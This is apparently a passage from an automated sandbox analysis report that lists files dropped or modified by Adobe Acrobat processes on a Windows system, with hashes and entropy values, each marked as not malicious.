SHA-256: | CF04769663F7B6829A782EE58DCC35DB314C256B0B56A8D82706717592897722 |
SHA-512: | 5541CAEC8F4ADC3BD3F80623434CD4A9E871854A439A10F190E5D863356A2229B88213D34A28093422325DD1A45C6E7C34BF52A8829C9A04928163E13F32B0CB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.239636913445581 |
Encrypted: | false |
SSDEEP: | 6:iOn57jSQL+q2PCHhJ2nKuAl9OmbnIFUtF57UG1Zmwr57UQLVkwOCHhJ2nKuAl9Oe:7n5jyvBHAahFUtF5R/r5NR56HAaSJ |
MD5: | B75B2C0AC8B9509CF7659562A9FDC087 |
SHA1: | C83BE7F974A8C949C7ED40F5A63C3F782084A65F |
SHA-256: | 42B200A00F6D0613ED210646411E6823AA790EE25EFF0247F902BF94CDFD6C80 |
SHA-512: | 98AE58F3757CF73F0B92F882D261BCEDB59B9E9CB9C2A1E6B1EF402E65AEE1A726BD7DB36F787506EA5DA5946FEA96C4298D95C12A5D2B39C49385DCE7A8F4B9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.239636913445581 |
Encrypted: | false |
SSDEEP: | 6:iOn57jSQL+q2PCHhJ2nKuAl9OmbnIFUtF57UG1Zmwr57UQLVkwOCHhJ2nKuAl9Oe:7n5jyvBHAahFUtF5R/r5NR56HAaSJ |
MD5: | B75B2C0AC8B9509CF7659562A9FDC087 |
SHA1: | C83BE7F974A8C949C7ED40F5A63C3F782084A65F |
SHA-256: | 42B200A00F6D0613ED210646411E6823AA790EE25EFF0247F902BF94CDFD6C80 |
SHA-512: | 98AE58F3757CF73F0B92F882D261BCEDB59B9E9CB9C2A1E6B1EF402E65AEE1A726BD7DB36F787506EA5DA5946FEA96C4298D95C12A5D2B39C49385DCE7A8F4B9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 335 |
Entropy (8bit): | 5.203756736803911 |
Encrypted: | false |
SSDEEP: | 6:iOn57KX3+q2PCHhJ2nKuAl9Ombzo2jMGIFUtF57KdWZmwr57K1VkwOCHhJ2nKuAv:7n5Y3+vBHAa8uFUtF57/r5mV56HAa8RJ |
MD5: | 400AE849AB98EF9FBBBFE6B8E1C3EEE8 |
SHA1: | C0BD23DCB18D4BD06D6727ED395C6403527CA38B |
SHA-256: | 49D21E7AFE9B16A8C24B2027EDBF03D69196D0BF1AC817BB4288E329E062AA73 |
SHA-512: | 99A9518D6138D306FB0C050C7E53CF20713F6D03A94EB54FFA367B26F156CF1F5E6657B865758F7C8A237738C4D225B4B174C4780FBF4406653EFA607F853BDC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 335 |
Entropy (8bit): | 5.203756736803911 |
Encrypted: | false |
SSDEEP: | 6:iOn57KX3+q2PCHhJ2nKuAl9Ombzo2jMGIFUtF57KdWZmwr57K1VkwOCHhJ2nKuAv:7n5Y3+vBHAa8uFUtF57/r5mV56HAa8RJ |
MD5: | 400AE849AB98EF9FBBBFE6B8E1C3EEE8 |
SHA1: | C0BD23DCB18D4BD06D6727ED395C6403527CA38B |
SHA-256: | 49D21E7AFE9B16A8C24B2027EDBF03D69196D0BF1AC817BB4288E329E062AA73 |
SHA-512: | 99A9518D6138D306FB0C050C7E53CF20713F6D03A94EB54FFA367B26F156CF1F5E6657B865758F7C8A237738C4D225B4B174C4780FBF4406653EFA607F853BDC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.942155595055161 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqr5VJksBdOg2H6fcaq3QYiub6P7E4T3y:Y2sRdsi57JdMH6u3QYhbS7nby |
MD5: | 388BDB7A604FAB446791A6E7577277C4 |
SHA1: | 7215C519CDCE7E0796C4A18AA13F304AED22E652 |
SHA-256: | FF9F7B790C6E0E892BC9E9F710B0325A557FEBE621DC9C4C8F240C068AD878D0 |
SHA-512: | B27AF70021138007C0EBE8916D8748FB8B538018777E5C445DBE99C1D49708CBFB8D8157B52CB3AEA90E6D755F4315762756E9A5ADA79B847CDB07E2CE00DA84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ef063361-5fa7-4ebf-b7ca-af5e61f7bf3b.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.942155595055161 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqr5VJksBdOg2H6fcaq3QYiub6P7E4T3y:Y2sRdsi57JdMH6u3QYhbS7nby |
MD5: | 388BDB7A604FAB446791A6E7577277C4 |
SHA1: | 7215C519CDCE7E0796C4A18AA13F304AED22E652 |
SHA-256: | FF9F7B790C6E0E892BC9E9F710B0325A557FEBE621DC9C4C8F240C068AD878D0 |
SHA-512: | B27AF70021138007C0EBE8916D8748FB8B538018777E5C445DBE99C1D49708CBFB8D8157B52CB3AEA90E6D755F4315762756E9A5ADA79B847CDB07E2CE00DA84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.2402292233253664 |
Encrypted: | false |
SSDEEP: | 96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bcVf5c:S43C4mS7fFi0KFYDjr3LWO3V3aw+bcVq |
MD5: | 4F99201FDAF99D96DC024419713D3665 |
SHA1: | AEF0FE201AB0FA497B5C39954EF10D2CC4AE582E |
SHA-256: | 78FCB342930526B520E6F9EDA9843F05E97CF1898140F7FF10D28A3C0F79570B |
SHA-512: | 1DF5DF8C8D37553F973EE35E91A6F90AEED68637F3D8CAB095EBF89DE9E0A7E9F0A8285683997A8C98759A645A5D9AC2FF44E2C108297566FF76C5ECFAAA0CC8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 323 |
Entropy (8bit): | 5.2041540280978005 |
Encrypted: | false |
SSDEEP: | 6:iOn5A+q2PCHhJ2nKuAl9OmbzNMxIFUtF50tVXWZmwr5RGFNVkwOCHhJ2nKuAl9Ob:7n5A+vBHAa8jFUtF50tVm/r5ANV56HAo |
MD5: | 77C8B1C64DF21D481FD2BBE58FE41CEB |
SHA1: | 627CBE9B5AA070C5A79AB69D960174862A4D109B |
SHA-256: | 151F6235766BE55DEEA7487029B4613AA0E0C053FA6C8050ED882B459EA87F5D |
SHA-512: | 578D53E20F63A0309CF069669C9A46E74C00BDDF7A103EF78907E0435105FA920224E67E053E8F84E5E229A92C972ABAC8CAFDB646A4D8741F64205ED314DF9C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 323 |
Entropy (8bit): | 5.2041540280978005 |
Encrypted: | false |
SSDEEP: | 6:iOn5A+q2PCHhJ2nKuAl9OmbzNMxIFUtF50tVXWZmwr5RGFNVkwOCHhJ2nKuAl9Ob:7n5A+vBHAa8jFUtF50tVm/r5ANV56HAo |
MD5: | 77C8B1C64DF21D481FD2BBE58FE41CEB |
SHA1: | 627CBE9B5AA070C5A79AB69D960174862A4D109B |
SHA-256: | 151F6235766BE55DEEA7487029B4613AA0E0C053FA6C8050ED882B459EA87F5D |
SHA-512: | 578D53E20F63A0309CF069669C9A46E74C00BDDF7A103EF78907E0435105FA920224E67E053E8F84E5E229A92C972ABAC8CAFDB646A4D8741F64205ED314DF9C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 57344 |
Entropy (8bit): | 3.2931564814063683 |
Encrypted: | false |
SSDEEP: | 192:PedRBnVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:PeZci5H5FY+EUUUTTcHqFzqFP |
MD5: | 5E8B504BAE3823D5F76E3C8BD74E7EEF |
SHA1: | 11AC9174B11103F31D520772F320C3E92FAD9B5D |
SHA-256: | 27FE9CC14D32E2BCA92C491BCB140474D1187383675D2E94DC37C618C36803A3 |
SHA-512: | FF9538E82DFBE3501A94D3ACD6208508B70FE07ADBCE3B7FD907FAB5BCFA01B4747D41EDD25DE4DBB424756E7E6C29D04C399EFC5FE7CFFCA707FBEE1E540D7F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2083955606463186 |
Encrypted: | false |
SSDEEP: | 24:7+tplWTfwKavqLKzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmfl:7MSaqOmFTIF3XmHjBoGGR+jMz+LhNn |
MD5: | 1CD5FEA5416CE4395842C7D4936EE45E |
SHA1: | 7E682FEE6019C4AE239BCD6D53FC3E5F1277EC6E |
SHA-256: | A6BC5237E6BBEFAD5CDC830F3944D5549B2CE35E44370DDF5823275567856844 |
SHA-512: | 1E91C658E0CDEECC46CDA8E5232258EB8A1A695017EF1E2B4C18F96F804E8F61E9BC445AEE30CDAFDC188170B6FF232DD80666D439A305F687F474033668DD87 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7386214950254377 |
Encrypted: | false |
SSDEEP: | 3:kkFklgsIKPtfllXlE/HT8klbNNX8RolJuRdxLlGB9lQRYwpDdt:kK5sIKPeT8qpNMa8RdWBwRd |
MD5: | A46AFFA66C17A0A41DE26366C1B52DF1 |
SHA1: | 425965B6BB471BEA84626C619384ECC02D8412E5 |
SHA-256: | 4F8435385DAEAC799BC1ACFD586A07F4B6D8B9A7D4227D5B00CDD55D4CD93C88 |
SHA-512: | 748607B2188687E93CB63A0528FA5DE6F5B19F3B53B9E8A8DC6270A8F5F0F41EB9F727695E3F1C866779577B8AA1EBA8FBD3969EC7CEF08FB93CEE15F97305B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.236892865807448 |
Encrypted: | false |
SSDEEP: | 6:kKxdL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:pdiDImsLNkPlE99SNxAhUe/3 |
MD5: | 4588548ABC3C56A80239A796A1E4E448 |
SHA1: | EAD8CE06C72CEA7EB38160AB1909E9A8027AC67C |
SHA-256: | 4F65D131A857F726C315808C49D6AB14C1A283D8E1A78BECAAA6A6EBCD5CD35D |
SHA-512: | 990A73E7C2793A729F37C96AD190621E15FCB6C0DEF5A3E7448ADCBB965353C19AB93724029A04A6688E8AAF1AB4C45AADD341DABDD1469BA75240D19BFE6BC9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.354929940652582 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJM3g98kUwPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGMbLZ |
MD5: | 1A57BCD9BF3729A4962FF915632E4072 |
SHA1: | C61090FAE302A67DDB1C5690FE5CD06FD352F213 |
SHA-256: | 54AC0AF7574CE571B476593E8075E5072381BB66DD76CF0E2D8A8CEA5C5E1945 |
SHA-512: | 151DE2EC93E0E6ABD24A33E6A122E8E1665568353DF521A5436F128EEF70DBDCCD414D8375D8774C8628792751643456E56DA7CBE0F88B8DB93E926FC46ECE08 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.289600556787794 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfBoTfXpnrPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGWTfE |
MD5: | B5B6D0E819BDC72119340B470A9680AB |
SHA1: | 17D59581D37F5DCC6416B82FCF9690CECD511367 |
SHA-256: | A190006110122BE92F8C3CDA1B8D3CE97522A7DCFDBCC2432B5D5311FF3C1454 |
SHA-512: | 46860FBCD950A042DC50839C567008BB4B47DAC8D5E323CA7643D1DC4206D553BBF7FD4681C7617DBB1AFA45BAAC216BC2CEA248B9BA77A40215927984B80ECC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.267739471533061 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfBD2G6UpnrPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGR220 |
MD5: | 6694B655FD214B89D0014DE0C229C869 |
SHA1: | 782F5DF254B5B7C2A71ACBD93494D1FC8BCF06AD |
SHA-256: | F5674729F1697AFE565E5F5D1B08C311F58AD799733473A3656AA6A26FC4F102 |
SHA-512: | B8881F64F9BC72F427DC22D116648D9E704054DD919A491963192D9DF47E5886AFCB99861A529AC825C69C0A5390C795BA8BD0576E30F08548B124EB116C6165 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.33158257682368 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfPmwrPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGH56Z |
MD5: | 9D898A7DE043C80E9B8393E4E7A7BBB1 |
SHA1: | 7F2E2034793E0C7FBD0E24F3E2469D9304A530AC |
SHA-256: | 7F3AD09181A16A0FBC88B62FD6A3D0FAB9B521482AD400B57891206940F84E2E |
SHA-512: | 6CFA543237DB9894BAA03A3C8DB7642F8DC1356D0D1994DC2E7A36B496488E862A1753670C1B4438F2B436EA297F0B647D01FCF7692A2939BB56D930C7C5B41D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.689147077262645 |
Encrypted: | false |
SSDEEP: | 24:Yv6XBIDcO2JhcpLgE9cQx8LennAvzBvkn0RCmK8czOCCSX:YvEIDcpJhchgy6SAFv5Ah8cv/X |
MD5: | 3BC6E00A600FBB6A5A79B4018FFBC284 |
SHA1: | 3AA2CB362C2D68C579DD580FDE819FC27BF2257D |
SHA-256: | DF8FD904F92E12DC3949C0B3FEF904BC3FD8AE82FA4DB47F26EF94BEB484F656 |
SHA-512: | 32824DF107BE40F457AA3BB18EBEB5F6EB6DE7178CCD8274578BD2D5FF4C150BF508EF791C29B350604246479EE5A2134E450695DDD7092AD566ACFD9AF98F1C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.2782264615334915 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJf8dPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGU8UU |
MD5: | 22298E93E08CC5CA61A4B2E4938DDDFD |
SHA1: | AEC8CE2EBC531CCAF713A98558E348F920BE5F3B |
SHA-256: | 3E9D95388D142F4B1C661795441C663AD62195236038FF2410066B5F3B8FE5C1 |
SHA-512: | 9087D759945DB256A5514C59DA46AAA7F7E5AE99F89BFC2EE8D66536F2EEAC00B6F90B9FD50127FAC86FD7226F224D0E3F6DEC46B25C5F048BFC1BEA983FB444 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.276529333135839 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfQ1rPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGY16Z |
MD5: | C625B43476E67994D0DCC705E1C22A11 |
SHA1: | 9638B5C31F32DB12F76280682E306A5CC352DAF8 |
SHA-256: | 2CB9FABE4D486961BEA7EF02787473F1C5425CB030E0F7E67124CD2ED3990D17 |
SHA-512: | 23BF9B501FAD56C76E30695D439E69266E76C910D0A0F257831CB3103670A1D60BA48E998897C9C0EBE03A25A7572769C33A2758D85D14DC34DFA99C54522904 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.292312586113629 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfFldPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGz8UU |
MD5: | 7A9E35E2451F0C85F41D318D0B94B356 |
SHA1: | CAD912FE8251696A629ACE092A87EE4DD6F70724 |
SHA-256: | EE42A774202ACF53E5A2758CC0D32AAA829E3A78F9B7438DD4C5FC5A6A492474 |
SHA-512: | 1ED1AFF79F9761028B46375AB33A8D139B7A77ECF19BBF66D941C0A8B485466BB978E57580CCBBBF36B6EC4D855C8A72951A69F6D091D324E4B3FC13C9005DE4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.307422012787065 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfzdPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGb8UU |
MD5: | 241CD6784F07B73943189E2A48B5AD58 |
SHA1: | FEDE34194AEE276A389AA1D284357104C8EF8C8D |
SHA-256: | D8E8FFE04A4EE65360FEB89C744D320340086BCA5184F4385854E56E1F071FB1 |
SHA-512: | 29061435995576EC4C85954CBEE3B44A80CFDAFE5717276DF96EDEC03BC579BBD2B5DFF438B63FF02D1558F02F9E630C835112E227F4C4D58847116E6621287D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.287524014826359 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfYdPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGg8UU |
MD5: | BBD97BCF7BFE7EEB2B926CB99ECBE8AB |
SHA1: | B4B864DB37B9398452998E6A7A9FDD660A286E1F |
SHA-256: | 24DFECB2FE286B7A3E5E09AEA4BDBEB237371C7B505BE757E597EADBC6750D16 |
SHA-512: | 3E4CE7341CC3C007DBA1FFB306EEB5C630D1387FA46CE391CBA3120E94610924ECE956BF70C81C0CF6CAE80868FBB1BBA77A53C36737B479E3A1D8457EB822E3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.273653730950579 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJf+dPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVG28UU |
MD5: | 9A93E831D3CE1BDC0E3BC1EFEA61A100 |
SHA1: | C669887C37935F5DB7A2FF094F39BD61F6C28D99 |
SHA-256: | 2B102579BCF6B2341A7BA3B4A49EC920455DAE4C837254DC38A6C223C8DDF6D8 |
